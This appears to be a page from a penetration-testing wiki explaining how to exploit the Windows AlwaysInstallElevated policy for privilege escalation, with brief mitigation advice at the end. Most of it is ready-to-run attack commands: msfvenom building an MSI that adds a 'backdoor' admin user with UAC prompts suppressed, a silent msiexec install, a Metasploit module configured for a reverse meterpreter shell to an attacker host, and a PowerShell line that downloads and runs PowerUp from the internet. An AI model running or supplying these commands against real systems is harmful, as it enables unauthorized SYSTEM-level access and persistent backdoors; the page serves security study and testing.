EoP - AlwaysInstallElevated

Exploiting AlwaysInstallElevated Policy: A Guide

Key Concept: AlwaysInstallElevated Policy

The AlwaysInstallElevated policy allows standard users to install MSI packages with elevated privileges if both user and system registry keys are configured. This can be exploited to perform actions under elevated privileges, such as creating users or executing malicious payloads.

Step 1: Checking Registry Values

1.1 User Registry Key

Check if the user-level AlwaysInstallElevated setting is enabled:

Command Prompt/PowerShell:

cmdCopy codereg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Expected Output:

plaintextCopy codeAlwaysInstallElevated    REG_DWORD    0x1

1.2 Machine Registry Key

Check if the machine-wide AlwaysInstallElevated setting is enabled:

cmdCopy codereg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

PowerShell Alternative:

powershellCopy codeGet-ItemProperty HKLM:\Software\Policies\Microsoft\Windows\Installer
Get-ItemProperty HKCU:\Software\Policies\Microsoft\Windows\Installer

Note: Both keys must be set to 1 for exploitation.

Step 2: Creating the MSI Package

Using msfvenom to Create a Malicious MSI

Generate an MSI package that adds a user with elevated privileges:

Command:

bashCopy codemsfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi

Suppressing UAC Prompts:

bashCopy codemsfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -nouac -o evil.msi

Custom Payloads

You can replace the payload with any desired functionality, such as reverse shells.

Step 3: Installing the MSI Package

Once the MSI package is created, install it quietly without user interaction:

Command:

cmdCopy codemsiexec /quiet /qn /i C:\path\to\evil.msi

Step 4: Automating with Metasploit or PowerUp

4.1 Metasploit

Metasploit provides an exploit module for this technique:

Command:

bashCopy codeuse exploit/windows/local/always_install_elevated
set payload windows/meterpreter/reverse_tcp
set LHOST <attacker_ip>
set LPORT <attacker_port>
exploit

4.2 PowerUp Script

PowerUp, a PowerShell tool, can automate checking and exploiting this vulnerability.

Check AlwaysInstallElevated Settings:

powershellCopy codeIEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1')
Get-RegistryAlwaysInstallElevated

Generate and Install MSI Package via PowerUp:

powershellCopy codeWrite-UserAddMSI -UserName backdoor -Password backdoor123

Security Implications

Impact of Exploitation

  • Privilege Escalation: Allows attackers to run arbitrary MSI packages with SYSTEM privileges.

  • Persistence: Attackers can create privileged accounts or install backdoors.

Mitigation Strategies

1. Disable AlwaysInstallElevated

Ensure both registry keys are set to 0:

cmdCopy codereg delete HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /f
reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /f

2. Least Privilege

Restrict user permissions to prevent unauthorized installation of software.

3. Audit and Monitor

Regularly audit registry settings and monitor MSI installation activity.

References

This guide outlines steps to exploit and mitigate the AlwaysInstallElevated vulnerability. Always adhere to legal and ethical guidelines.

PreviousEoP - Kernel ExploitationNextEoP - Insecure GUI apps

Last updated